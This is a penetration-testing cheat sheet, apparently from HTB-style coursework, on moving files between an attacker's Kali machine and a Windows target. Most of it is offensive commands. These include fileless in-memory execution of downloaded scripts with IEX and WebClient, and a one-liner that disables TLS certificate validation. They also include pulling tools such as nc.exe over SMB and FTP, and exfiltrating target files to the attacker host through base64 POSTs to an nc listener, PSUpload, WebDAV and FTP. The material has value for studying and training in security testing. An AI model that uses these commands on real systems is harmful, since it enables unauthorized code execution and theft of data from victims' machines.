1 - Windows File Transfer

# PowerShell Base64 String Copy+Paste ```bash #base64 encode file on Linux md5sum file #create and save hash to later confirm file integrity after transfer cat file |base64 -w 0;echo #output base64 encoded string to stdout ``` ```powershell #copy+paste encoded string into Windows [IO.File]::WriteAllBytes("C:\Users\Public\<file_name>", [Convert]::FromBase64String("<string>")) #decode base64 string Get-FileHash C:\Users\Public\<file_name> -Algorithm md5 #compare against previous hash to confirm integrity #NOTE: cmd.exe has a maximum string length of 8,191 characters ``` # Powershell Web Download - typically HTTP and HTTPS are open to outbound traffic - defender may prevent download of some file types like `shell.exe` - use the `system.net.webclient class` to download over HTTP, HTTPS, or FTP ```bash #setup http server on Kali host python3 -m http.server <port> ``` ```powershell (New-Object Net.WebClient).DownloadFile('http://<kali_host_ip:<port>/<target_file>','<Output File Name>') #NOTE: target file URL could be on GitHub or hosted by Kali host ``` | WebClient Method | Description | | ------------------- | ------------------------------------------------------------------------------------------- | | OpenRead | Returns the data from a resource as a stream | | OpenReadAsync | Returns the data from a resource without blocking the calling thread | | DownloadData | Downloads data from a resource and returns a Byte array | | DownloadDataAsync | Downloads data from a resource and returns a Byte array without blocking the calling thread | | DownloadFile | Downloads data from a resource to a local file | | DownloadFIleAsync | Downloads data from a resource to a local file without blocking the calling thread | | DownloadString | Downloads a String from a resource and returns a string | | DownloadStringAsync | Downloads a String from a resourcewithout blocking the calling thread | - PowerShell can also be used to perform fileless attacks. Instead of downloading a PowerShell script to disk, we can run it directly in memory using the [Invoke-Expression](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2) cmdlet or the alias `IEX` ```bash #setup http server on Kali host python3 -m http.server <port> ``` ```powershell IEX (New-Object Net.WebClient).DownloadString('http://<kali_host_ip:<port>/<target_file>') #directly run target file in memory #alternative to the above cmdlet (New-Object Net.WebClient).DownloadString('http://<kali_host_ip:<port>/<target_file>') | IEX #pipeline input from WebClient to IEX #NOTE: target file URL could be on GitHub or hosted by Kali host ``` - With powershell 3.0 onwards, the [Invoke-WebRequest](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2) cmdlet is also available, but it is somewhat slower at downloading files - The aliases `iwr`, `curl`, and `wget` can be used in place of the full-name for the cmdlet: `Invoke-WebRequest` ```bash #setup http server on Kali host python3 -m http.server <port> ``` ```powershell Invoke-WebRequest http://<kali_host_ip:<port>/<target_file> -OutFile file_name.ps1 #NOTE: target file URL could be on GitHub or hosted by Kali host ``` ## Common Errors with PowerShell - When the IE first-lauch configuration has not been completed, download may be prevented. Add below flag to PS download commands: - ==Add `-UseBasicParsing` flag to `Invoke-WebRequest` or `IEX`== - When encountering errors related to the SSL/TLS secure channel if the certificate is not trusted, execute following PS command and retry download command: - `[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}` # SMB Downloads - Leverage SMB (TCP/445) to download files to target Windows machine from attacker Kali machine - First, initialize an SMB server on Kali and host file - Second, use `copy` or `move` commands with `cmd.exe` OR `Copy-Item` cmdlet with PowerShell to pull file from Kali SMB server ## Create SMB Server on Linux ```bash sudo impacket-smbserver share -smb2support /tmp/share #host files in /tmp/share via SMB sudo impacket-smbserver share -smb2support /tmp/share -user test -password test #host files with user_name:password authentication #impacket-smbserver = smbserver.py #here 'share' = share name ``` ## Copy File from SMB Server ```cmd copy \\<kali_host_ip>\share\nc.exe ``` ## Mount SMB Share with Username:Password Authentication ```cmd #newer Windows versions diable unauthenticated guest access to shares net use n: \\<kali_host_ip>\share /user:test test #mount share with user_name:password copy n:\nc.exe #copy target file from mounted share ``` # FTP Downloads - Setup FTP server on Kali host ```bash sudo pip3 install pyftpdlib #intall python module if necessary sudo python3 -m pyftpdlib --port 21 #initialize FTP server and specify port, by default this module uses port 2121 ``` - Download files from FTP Server using PowerShell ```powershell (New-Object Net.WebClient).DownloadFile('ftp://<kali_host_ip>/<target_file>.txt', 'C:\Users\Public\<output_file>.txt') ``` - If we don't have an interactive shell on remote machine to access PowerShell, use the below steps to create an FTP command file to download file from FTP server ```cmd-session C:\htb> echo open <kali_host_ip> > ftpcommand.txt C:\htb> echo USER anonymous >> ftpcommand.txt C:\htb> echo binary >> ftpcommand.txt C:\htb> echo GET <target_file>.txt >> ftpcommand.txt C:\htb> echo bye >> ftpcommand.txt C:\htb> ftp -v -n -s:ftpcommand.txt #command to execute FTP command file #below are automated steps based on FTP command file ftp> open <kali_host_ip> Log in with USER and PASS first. ftp> USER anonymous ftp> GET <target_file>.txt ftp> bye C:\htb>more <target_file>.txt #cat the received file This is a test file ``` # Upload Operations - Situations may occur, such as password cracking, analysis, exfiltration, etc., where we must upload files from our target machine onto our Kali host ## PowerShell Base64 Copy+Paste ```powershell #base64 encode target file on Windows [Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\<target_file>" -Encoding byte) #base64 encode target file Get-FileHash "C:\Windows\system32\drivers\etc\<target_file>" -Algorithm MD5 | select Hash #create and save hash to later confirm file integrity after transfer ``` ```bash #copy+paste encoded string into Kali host echo <base64_string> | base64 -d > decoded_output #decode base64 string md5sum output #compare against previous hash to confirm integrity ``` ## PowerShell Web Uploads with PSUpload.ps1 - Configure upload server on Kali host ```bash #setup upload http server on Kali host pip3 install uploadserver #install python module for upload srever if necessary python3 -m uploadserver #start http upload server on port 8000 by default pipx install uploadserver pipx run uploadserver ``` - Use a PowerShell script [PSUpload.ps1](https://github.com/juliourena/plaintext/blob/master/Powershell/PSUpload.ps1) which uses `Invoke-RestMethod` to perform the upload operations. - This script accepts two parameters `-File`, which we use to specify the file path, and `-Uri`, which is the server URL where we'll upload our file ```PowerShell IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1') #run PSUpload.ps1 in memory Invoke-FileUpload -Uri http://<kali_host_ip>:8000/upload -File C:\Windows\System32\drivers\etc\<target_file> #use PSUpload.ps1 to move target file to Kali host ``` ## PowerShell Web Upload with Invoke-WebRequest and NC - As an alternative to the above, use PowerShell and base64 encoded files for upload operations is by using `Invoke-WebRequest` or `Invoke-RestMethod` together with `nc` on the Kali host ```PowerShell $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\<target_file>' -Encoding Byte)) #base64 encode target file Invoke-WebRequest -Uri http://<kali_host_ip>:8000/ -Method POST -Body $b64 #move target file to Kali host ``` ```bash #catch base64 data on Kali host nc -lvnp 8000 #setup nc listener echo <base64_string> | base64 -d -w 0 > decoded_output #decode the base64 string and output to a file ``` ## Restricted SMB Upload with WebDAV - Enterprises typically don't allow outbound SMB (TCP/445) from their internal network because this can open them up to potential attacks - If there are no outbound SMB (TCP/445) restrictions, we can use `impacket-smbserver` for upload operations as we did for download operations - As a work around, run SMB over HTTP with `WebDav` - `WebDAV` [(RFC 4918)](https://datatracker.ietf.org/doc/html/rfc4918) is an extension of HTTP that also supports HTTPS - `WebDAV` enables a webserver to behave like a fileserver, supporting collaborative content authoring ```bash #setup python modules for WebDAV on Kali host sudo pip3 install wsgidav cheroot sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous ``` ```cmd #connect to WebDAV share from Windows dir \\<kali_host_ip>\DavWWWRoot #test access ot WebDAV share on Kali host copy C:\Users\john\Desktop\<target_file>.zip \\<kali_host_ip>\DavWWWRoot\ #upload target file to WebDAV share #NOTE: DavWWWRoot is a special keyword recognized by the Windows Shell. No such folder exists on your WebDAV server. The DavWWWRoot keyword tells the Mini-Redirector driver, which handles WebDAV requests that you are connecting to the root of the WebDAV server #You can avoid using this keyword if you specify a folder that exists on your server when connecting to the server. For example: \<kali_host_ip>\sharefolder ``` ## FTP Uploads - Setup/start FTP server on Kali host ```bash sudo pip3 install pyftpdlib #intall python module if necessary sudo python3 -m pyftpdlib --port 21 --write #initialize FTP server for upload with --write flag and specify port, by default this module uses port 2121 ``` - Use PowerShell's upload function to upload target file to FTP server ```PowerShell (New-Object Net.WebClient).UploadFile('ftp://<kali_host_ip>/ftp-hosts', 'C:\Windows\System32\drivers\etc\<target_file>') ``` - If we don't have an interactive shell on remote machine to access PowerShell, use the below steps to create an FTP command file to upload file to FTP server ```cmd C:\htb> echo open <kali_host_ip> > ftpcommand.txt C:\htb> echo USER anonymous >> ftpcommand.txt C:\htb> echo binary >> ftpcommand.txt C:\htb> echo PUT c:\windows\system32\drivers\etc\<target_file> >> ftpcommand.txt C:\htb> echo bye >> ftpcommand.txt C:\htb> ftp -v -n -s:ftpcommand.txt #command to execute the ftp command file #below are automated steps based on FTP command file ftp> open <kali_host_ip> Log in with USER and PASS first. ftp> USER anonymous ftp> PUT c:\windows\system32\drivers\etc\<target_file> ftp> bye ```